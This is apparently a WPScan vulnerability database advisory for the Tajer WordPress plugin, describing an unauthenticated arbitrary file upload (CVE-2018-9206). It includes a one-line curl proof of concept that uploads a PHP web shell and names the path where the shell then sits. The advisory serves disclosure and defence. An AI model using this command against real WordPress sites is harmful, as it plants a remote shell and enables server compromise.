Tajer - Unauthenticated Arbitrary File Upload



Proof of Concept
curl -F "files=@shell.php" http://www.example.com/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php

Shell is uploaded to:

http://www.example.com/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/files/shell.php

Affects Plugin

References

CVE 2018-9206
URL http://www.vapidlabs.com/advisory.php?v=205

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Original Researcher Larry W. Cashdollar, @_larry0
Submitter Ryan Dewhurst
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 3371
Verified No
WPVDB ID 9136

Timeline

Publicly Published 2018-10-15 (about 1 month ago)
Added 2018-10-19 (about 1 month ago)
Last Updated 2018-10-19 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.